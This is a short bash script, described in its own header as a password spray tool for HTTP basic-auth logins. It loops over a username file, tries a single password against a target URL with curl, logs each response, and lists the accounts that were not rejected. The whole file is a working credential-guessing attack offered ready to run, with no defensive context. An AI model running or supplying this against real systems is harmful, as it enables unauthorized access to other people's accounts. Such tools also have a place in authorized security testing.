#!/bin/bash

#########################################################################################
# Here is a simple password spray for a basic auth attack                               #
#                                                                                       #
# Usage thisscript.sh pathof_usernames.txt password_to_try URL                          #
# I.e. ./thisscript.sh /tmp/usernames.txt Summer2019 https://website.com/login.php      #
#########################################################################################

script=$(basename -- "$0")


if [[ -z $1 || -z $2 || -z $3 ]]
then
clear && echo "You failed to execute this script correctly:
 Usage thisscript.sh pathof_usernames.txt password_to_try URL
 I.e $(pwd)/${script} /tmp/usernames.txt Summer2019 https://website.com/login.php"

exit 9
fi

cat /dev/null > /tmp/password_spray_results.txt


INPUT=$1
OLDIFS=$IFS
IFS=","
[ ! -f $INPUT ] && { echo "$INPUT file not found"; exit 99; }
while read useraccount
do
curl -s -vvvv -IL --user ${useraccount}:${2} ${3} -o .curl 2>.curl2
size=$(stat --printf="%s" .curl)
code=$(cat .curl | grep HTTP | tail -1)
        echo "$useraccount,$size,$code" >>/tmp/password_spray_results.txt

done < $INPUT
IFS=$OLDIFS

rm  .curl .curl2

echo "The below user accounts have a password of ${2}"
cat /tmp/password_spray_results.txt  | grep -v Unauthorized | cut -d',' -f1
echo "See results in /tmp/password_spray_results.txt file"


exit 0